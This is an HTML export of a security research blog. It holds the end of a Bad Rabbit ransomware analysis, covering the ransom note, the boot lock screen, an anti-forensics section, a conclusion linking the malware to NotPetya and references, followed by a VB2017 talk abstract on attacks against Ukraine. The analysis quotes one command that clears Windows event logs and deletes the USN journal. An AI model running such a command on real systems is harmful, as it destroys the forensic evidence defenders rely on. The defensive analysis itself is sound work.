<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="299" src="https://lh5.googleusercontent.com/NHeGgwSxZlhr4NCzH929wlHMPk4Uewo2Uvc7uIWK27khD2dJ3cT6bZbx8QpinAAC58bT9NDWx2c4x1gW2It0EZMmHkBdg1GCihtSEl9g71yvQj588KCdNlLyuW--DBvjJW6itX30" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In the root of the C drive, it leaves the Readme.txt with instructions with the key#2 needed to decrypt files:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="358" src="https://lh6.googleusercontent.com/4nUHo5HdgFYyeLMnyBrTVEaYXSvZ8VOXSpePYzv19uIKFQTj9Lk9uFrZVE_2LHFXlpzj25Iz_zujlPtpNg5NR4r1FI8kDrfiPI0AeVF6NfBPwawIKP1b4o9UARtQXk_UUrcEhxJc" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="596" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">After the scheduled reboot, the BadRabbit bootloader starts and locks the computer showing the installation key #1 needed to decrypt volumes and unlock the boot:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="349" src="https://lh6.googleusercontent.com/Qsia1cGeJjGCW1co8tRXVH8VdaYGRG3lH1nWnlpHM3B4pz0EHPMlmRrbCj7X5u2HBuotqYVnUbPIyHPfkDPx3xF_llg4AcBdDHdilu2cZ8E0SqWBrMS1kIB88T7fUaAnfEombR0l" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The website is in the Tor network and contains the fancy animation:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="471" src="https://lh5.googleusercontent.com/JKucmx9WqYYecfUKDdeQOixf58jEzzday7nZoXe2Ye-olIoFezB9Qk57StLZTUC6uIyZc_T5TE2dOJNKNbswsUEvRhTjvdnTIowrzEbbVw7RPnELSViggNFe4176cv1MbVrCPBIh" style="border: none; transform: rotate(0rad);" width="602" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="252" src="https://lh3.googleusercontent.com/ThV824HD7i80EFzkbKtYbFu2e3DYD-HBs_vVatribhlJ4l2PLJfsiXZaqtm9jReOdFrq_1fHG9xF9kufKtrRpYm4XLazt06oYqDnKk76htgWQE_w8lbQxFiNtkjayIvngm8cYyNN" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_ancoUmPOG81-bzFdiodgpGy4gERpmHr4S_4u36GkrmRk1SyOUP0AdMzA1SrIx9_DM2Am1wLPjmer1SV9t-YnffjiOrwd_m-U22Y10Z7frAWVO2uShac2OhFtZXJeJflqLKRIBIyYogWT/s1600/BadRabbit.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="372" data-original-width="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_ancoUmPOG81-bzFdiodgpGy4gERpmHr4S_4u36GkrmRk1SyOUP0AdMzA1SrIx9_DM2Am1wLPjmer1SV9t-YnffjiOrwd_m-U22Y10Z7frAWVO2uShac2OhFtZXJeJflqLKRIBIyYogWT/s1600/BadRabbit.gif" /></a></div>
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Anti-Forensics</span></h2>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Similar to NotPetya, the Bad Rabbit ransomware to wipe its own traces from the Event Log, runs the following command:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #444444; font-family: "arial"; font-size: 10.5pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %SYSTEMDRIVE%</span></div>
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Conclusion</span></h2>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Based on the analysis above, we can state with high confidence that the Bad Rabbit’s ‘infpub.dat’ module is based on NotPetya source code and is a new version of it. Consequently, the Bad Rabbit ransomware is written by the same author who is financially driven in the current attack. Based on the geographical diversity of the victims reported by Kaspersky Lab, we can suggest that it is not a nation-state attack. However, in the future, we can expect a new version, which can be used to attack the critical infrastructure of some state.</span></div>
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">References</span></h2>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The PCAP traffic and the tool to find the blacklisted process names is available on Github: </span><a href="https://github.com/AlexanderAda/NioGuardSecurityLab/tree/master/RansomwareAnalysis/BadRabbit" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://github.com/AlexanderAda/NioGuardSecurityLab/tree/master/RansomwareAnalysis/BadRabbit</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">More readings</span></h2>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-c5aa4db3-5f79-4189-9066-72a074c2ecb6"></span><br />
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://securelist.ru/bad-rabbit-ransomware/87771/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://securelist.ru/bad-rabbit-ransomware/87771/</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://securelist.com/bad-rabbit-ransomware/82851/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://securelist.com/bad-rabbit-ransomware/82851/</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://www.bleepingcomputer.com/news/security/bad-rabbit-ransomware-outbreak-hits-eastern-europe/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www.bleepingcomputer.com/news/security/bad-rabbit-ransomware-outbreak-hits-eastern-europe/</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://blog.malwarebytes.com/threat-analysis/2017/10/badrabbit-closer-look-new-version-petyanotpetya/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://blog.malwarebytes.com/threat-analysis/2017/10/badrabbit-closer-look-new-version-petyanotpetya/</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://www.endgame.com/blog/technical-blog/badrabbit-technical-analysis" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www.endgame.com/blog/technical-blog/badrabbit-technical-analysis</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://www.carbonblack.com/2017/10/24/threat-advisory-analysis-bad-rabbit-ransomware/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www.carbonblack.com/2017/10/24/threat-advisory-analysis-bad-rabbit-ransomware/</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="http://www.intezer.com/notpetya-returns-bad-rabbit/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://www.intezer.com/notpetya-returns-bad-rabbit/</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://blog.fortinet.com/2017/10/25/tracking-the-bad-rabbit" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://blog.fortinet.com/2017/10/25/tracking-the-bad-rabbit</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="http://blog.talosintelligence.com/2017/10/bad-rabbit.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://blog.talosintelligence.com/2017/10/bad-rabbit.html</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://labsblog.f-secure.com/2017/10/26/following-the-bad-rabbit/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://labsblog.f-secure.com/2017/10/26/following-the-bad-rabbit/</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://bartblaze.blogspot.in/2017/10/comparing-eternalpetya-and-badrabbit.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://bartblaze.blogspot.in/2017/10/comparing-eternalpetya-and-badrabbit.html</span></a></div>
</li>
</ul>
</div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-46817601990258968042017-10-02T10:58:00.001-07:002019-06-17T03:47:01.200-07:00VB2017: Battlefield Ukraine<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAp303tBk_DEneYZtIIK9dhFvG1NEqKSV0i1oTBiyyYWC7tNCDafG6qQ8WD77prwTMVpAAvejzUdOMDBJZaAuTbUcK_eKbF-3tJT8gfco0z8r_RZh4baCRu9SwGd5xv4nxn-5w9SK-ANKN/s1600/VB2017_title.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="900" data-original-width="1600" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAp303tBk_DEneYZtIIK9dhFvG1NEqKSV0i1oTBiyyYWC7tNCDafG6qQ8WD77prwTMVpAAvejzUdOMDBJZaAuTbUcK_eKbF-3tJT8gfco0z8r_RZh4baCRu9SwGd5xv4nxn-5w9SK-ANKN/s640/VB2017_title.png" width="640" /></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">This summer, Ukraine unwillingly became the battlefield of the hacker group(s) with the supposedly Russian roots and the antivirus industry. This is not the first time when Ukraine attracts attention of cyber security experts. Suffice it to recall in this regard the several waves of cyber attacks against critical infrastructure of Ukraine using the BlackEnergy [</span><a href="https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/" style="font-family: Arial; font-size: 11pt; white-space: pre-wrap;">1</a><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">] and Industroyer [</span><a href="https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" style="font-family: Arial; font-size: 11pt; white-space: pre-wrap;">2</a><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">,</span><a href="https://dragos.com/blog/crashoverride/CrashOverride-01.pdf" style="font-family: Arial; font-size: 11pt; white-space: pre-wrap;">3</a><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">] industrial malware supposedly created by a Russian hacker group.</span></div>
<b id="docs-internal-guid-b3019a32-de33-e93e-c064-e8a5e3a87085" style="font-weight: normal;"></b><br />
<a name='more'></a><b id="docs-internal-guid-b3019a32-de33-e93e-c064-e8a5e3a87085" style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR6UhAoJrN9hFT00EE8Uk-bSwupzYet2fbxr7_sVs-pp4Ty9IdPGFkFjEF_0cywVN0jI3yQhAxdKqhoOann5L7rQ0s-lBdJI9PnsdRI5jrgMpY9BQVZdeOoahgqKXnw-6ycbY5KHHSZrPH/s1600/vb2017_BattlefieldUkraine.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="842" data-original-width="1113" height="484" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR6UhAoJrN9hFT00EE8Uk-bSwupzYet2fbxr7_sVs-pp4Ty9IdPGFkFjEF_0cywVN0jI3yQhAxdKqhoOann5L7rQ0s-lBdJI9PnsdRI5jrgMpY9BQVZdeOoahgqKXnw-6ycbY5KHHSZrPH/s640/vb2017_BattlefieldUkraine.jpg" width="640" /></a></div>
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This summer, we noticed the supply-chain attack through the popular in Ukraine M.E.Doc accounting software ended with the splash of NotPetya ransomware-wiper [<a href="https://nioguard.blogspot.com/2017/06/eternalpetya-ransomware-analysis.html">4</a>]. During the M.E.Doc campaign, we discovered the attacks run with the help of several specially crafted ransomware: XData (AES-NI clone) [<a href="https://nioguard.blogspot.com/2017/06/xdata-ransomware-attacked-users-in.html">5</a>], WannaCry.NET (WannaCry clone) [<a href="https://nioguard.blogspot.com/2017/06/one-more-attack-to-ukraine-via-medoc.html">6</a>], and NotPetya (Petya&Misha&WannaCry clone). It is worth mentioning, that the first notable infection through the trojanized MEDoc [<a href="https://nioguard.blogspot.com/2017/07/comparing-medoc-backdoors-in-176-186.html">7</a>] with XData ransomware happened in the middle of May - more than a month before NotPetya was launched.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Now, we are seeing another ongoing campaign against Ukrainian organizations that follows the similar scenario. First, the attackers hacked the web server of the Ukrainian producer of another accounting software [<a href="https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html">8</a>], to upload Chthonic (Zeus-based) backdoor seen in June in the nation-state attack against Ukrainian government institution [<a href="https://nioguard.blogspot.com/2017/06/chthonic-trojan-is-back-in-nation-state.html">9</a>] and PSCrypt-2 - a clone of GlobeImposter (Globe-based) ransomware [<a href="https://www.bleepingcomputer.com/news/security/before-notpetya-there-was-another-ransomware-that-targeted-ukraine-last-week/">10</a>]. Then, they spearphished the targets to make them download and install one of these options.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">We continue working with the victims to find out more information about the attack vectors.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In the talk, we’ll show the timeline and highlight the patterns behind these attacks in:</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The attack vectors</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The types of used malware in the context of previous nation-state attacks</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Ransomware design style</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">C&C domains</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Peculiarities in the language use</span></div>
</li>
</ul>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Finally, we’ll end up with our hypotheses supposing who stays behind the summer attacks in Ukraine.</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span> <span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">UPD:</span> <span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The </span><span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">slides from </span><span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;">VB2017 </span><span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">are available by the link: </span><span style="color: #2200cc; font-family: "arial"; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;"><a href="https://goo.gl/fKR9hK" style="text-decoration-line: none;">https://goo.gl/fKR9hK</a></span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[1] </span><a href="https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/</span></a></div>
